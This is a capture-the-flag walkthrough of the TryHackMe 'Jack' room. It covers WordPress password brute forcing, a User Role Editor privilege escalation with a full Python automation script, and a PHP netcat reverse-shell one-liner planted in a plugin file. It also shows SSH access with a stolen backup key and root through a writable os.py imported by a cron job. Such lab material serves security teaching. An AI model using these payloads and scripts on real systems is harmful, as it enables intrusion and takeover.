Jack

https://tryhackme.com/room/jack

Add jack.thm to /etc/hosts

User flag

Let's start with an nmap scan.

We see there are only two open ports. Let's head to port 80 to see if we can find something interesting.

Let's check robots.txt

Nothing really interesting at first glance. Let's fire up wpscan.

In my experience most WordPress boxes come down to brute forcing, so let's try to get those users' passwords. Brute forcing the login with the rockyou.txt wordlist was taking far too long, so we switched to the fasttrack wordlist instead.

Nice. We got one. Let's log in.

We can't get a reverse shell with a non-privileged user, so we need to turn this account into an admin one. After taking a look at the HINT we see there's a vulnerability involving the User Role Editor plugin.

We can use Metasploit or do it manually. We chose manual: https://vk9-sec.com/wordpress-plugin-user-role-editor-4-24-privilege-escalation/

Let's fire up Burp Suite, turn on intercept, and click on "Update Profile".

We need to append "&ure_other_role=administrator" to the end of the POST request body.

If we forward all the requests we can see we now have admin privileges.
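The same profile-update replay can be scripted instead of clicking through Burp. The script below is an added example written for this page, not the writeup's or the vk9-sec post's code. It uses only the standard library; the jack.thm URL, the WordPress form-field names (_wpnonce, action=update, user_id) and the users.php probe are assumptions about a stock WordPress install, and the HTML fragment inside it is constructed for offline testing.

```python
#!/usr/bin/env python3
"""Added example for the User Role Editor step: log in as the cracked
low-privileged user, resubmit the profile form with the extra
ure_other_role parameter and check whether the account became an admin.
Standard library only; the WordPress form-field names and URLs are
assumptions about a stock install, not taken from the box."""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

INPUT_RE = re.compile(r"<input\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')

# Constructed fragment of a wp-admin/profile.php page, used for offline testing.
SAMPLE_PROFILE_HTML = (
    '<input type="hidden" id="_wpnonce" name="_wpnonce" value="deadbeef01" />'
    '<input type="hidden" name="_wp_http_referer" value="/wp-admin/profile.php" />'
    '<input type="hidden" name="action" value="update" />'
    '<input type="hidden" name="user_id" id="user_id" value="2" />'
    '<input type="text" name="nickname" id="nickname" value="wendy" />'
    '<input type="checkbox" name="rich_editing" id="rich_editing" value="false" />'
    '<input type="submit" name="submit" id="submit" value="Update Profile" />'
)


def form_fields(html: str) -> dict:
    """Collect name/value pairs from <input> tags the way a browser submits
    them: buttons are dropped, unchecked boxes are left out, everything
    else (nonce, referer, action, user_id, nickname, e-mail) is kept."""
    fields = {}
    for m in INPUT_RE.finditer(html):
        raw = m.group(1)
        attrs = dict(ATTR_RE.findall(raw))
        name = attrs.get("name")
        kind = attrs.get("type", "text").lower()
        if not name or kind in ("submit", "button"):
            continue
        if kind in ("checkbox", "radio") and "checked" not in raw:
            continue
        fields[name] = attrs.get("value", "")
    return fields


def add_role_param(body: str, role: str = "administrator") -> str:
    """The trick from the writeup: append ure_other_role to the captured
    profile.php POST body, which the vulnerable plugin honours on save."""
    pairs = urllib.parse.parse_qsl(body, keep_blank_values=True)
    pairs.append(("ure_other_role", role))
    return urllib.parse.urlencode(pairs)


def escalate(base_url: str, user: str, password: str,
             role: str = "administrator") -> bool:
    """Log in, replay the profile update with the extra field, then probe
    wp-admin/users.php, which only admins may list. Returns True when the
    probe no longer comes back with WordPress's 'not allowed' page."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))
    login = urllib.parse.urlencode({"log": user, "pwd": password,
                                    "redirect_to": base_url + "/wp-admin/"})
    opener.open(base_url + "/wp-login.php", login.encode())
    html = opener.open(base_url + "/wp-admin/profile.php").read().decode(
        "utf-8", "replace")
    fields = form_fields(html)
    if "_wpnonce" not in fields:
        raise RuntimeError("no profile form found: did the login fail?")
    body = add_role_param(urllib.parse.urlencode(fields), role)
    opener.open(base_url + "/wp-admin/profile.php", body.encode())
    try:
        page = opener.open(base_url + "/wp-admin/users.php").read()
    except urllib.error.HTTPError as err:  # wp_die() answers 403 for non-admins
        page = err.read()
    return b"not allowed" not in page


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} http://jack.thm USER PASSWORD")
    ok = escalate(sys.argv[1].rstrip("/"), sys.argv[2], sys.argv[3])
    print("administrator" if ok else "still a low-privileged user")
```

Run it as `python3 ure_escalate.py http://jack.thm wendy <password>` (file name and credentials are placeholders). Resubmitting every field of the real form matters: WordPress rejects a profile update with an empty nickname or e-mail, so a hand-built body with only the nonce and the new role would fail before the plugin ever sees ure_other_role.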

With admin privileges we can get a reverse shell the usual way:

Plugins > Plugin Editor > akismet.php. Let's add the following (replace <ip address> and <port> with our listener's):

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip address> <port> >/tmp/f") ?>

Start a nc listener on the chosen port, save the file and activate the plugin so the code runs.

Nice. We got in. Now we have to upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(press Ctrl+Z to background the shell)
stty raw -echo; fg

Root flag

Reading "reminder.txt" suggests something happened with the backups, so let's head to /var/backups.

There's a juicy id_rsa file in there. Copy its contents to our machine, chmod 600 the file, and SSH into the box as jack using the key.

Before using Linpeas or any other automated enumeration tool let's take a look around the system. We see something interesting in the /opt/statuscheck folder.

By the looks of "output.log" it seems "checker.py" is being run every two minutes.

We can't create files in this folder, so let's check whether we have write permission on os.py (imported by checker.py) and can add a reverse shell to it.

We do (we edit the Python 2.7 copy because the system's Python version is 2.7.12).

Let's add a reverse shell at the end of the file. Since every Python process on the box imports os, the payload should spawn the shell in the background rather than block, or everything else that uses Python hangs too.
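Before editing anything it helps to know exactly which library files checker.py pulls in and which of them we can write to. The script below is an added example for this page, not part of the writeup or the box: it parses a script's import statements, resolves each module to the .py file Python would load from a given library path, and reports whether the current user has write access. It only finds the hijack target; appending the reverse shell to os.py is still the manual step above. The /usr/lib/python2.7 path in the usage note is an assumption about where Ubuntu installs the 2.7 library.

```python
#!/usr/bin/env python3
"""Added example for the checker.py step: list the modules a script
imports and which of their source files the current user can write to,
i.e. hijack candidates when the script is run by a root cron job.
Not part of the writeup. Pass the library directory of the interpreter
that runs the cron job (python2.7 on the box) so the paths match what
that job actually loads; with no directories given, sys.path is used."""
import ast
import os
import sys


def parse_imports(source: str) -> list:
    """Module names named by 'import x' / 'from x import y' in the source.
    Relative imports (from . import y) are skipped: they live beside the
    script, not in the system library."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module)
    return sorted(names)


def resolve_origin(module: str, search_path=None):
    """Walk the search path the way the import system does for pure-Python
    modules: a.b.c -> a/b/c.py or a/b/c/__init__.py. Built-ins (sys) and C
    extensions have no .py and give None. Note: on Python 3.11+ os and a
    few others are frozen into the binary, so their .py on disk is not
    what gets loaded; on the box's 2.7 the file on disk is the real thing."""
    parts = module.split(".")
    for base in (search_path if search_path is not None else sys.path):
        for candidate in (os.path.join(base, *parts) + ".py",
                          os.path.join(base, *parts, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None


def writable_imports(source: str, search_path=None) -> dict:
    """Map each imported module to (resolved file or None, writable by us)."""
    report = {}
    for name in parse_imports(source):
        origin = resolve_origin(name, search_path)
        writable = origin is not None and os.access(origin, os.W_OK)
        report[name] = (origin, writable)
    return report


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} SCRIPT.py [LIBDIR ...]")
    with open(sys.argv[1]) as fh:
        src = fh.read()
    libs = sys.argv[2:] or None  # e.g. /usr/lib/python2.7 for the box's cron job
    for name, (origin, writable) in writable_imports(src, libs).items():
        flag = "WRITABLE" if writable else "        "
        print(f"{flag}  {name:<24} {origin}")
```

On the box this would be run as `python3 find_writable_imports.py /opt/statuscheck/checker.py /usr/lib/python2.7` (script name assumed). Anything marked WRITABLE that a root job imports is a root shell waiting to happen, which is exactly the os.py finding above; the same scan run as the defender, with the directories the cron interpreter uses, is the quick way to catch world-writable library files before someone else does.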

After a couple of minutes the job runs again and we get a root shell on our listener. Let's grab the flag.
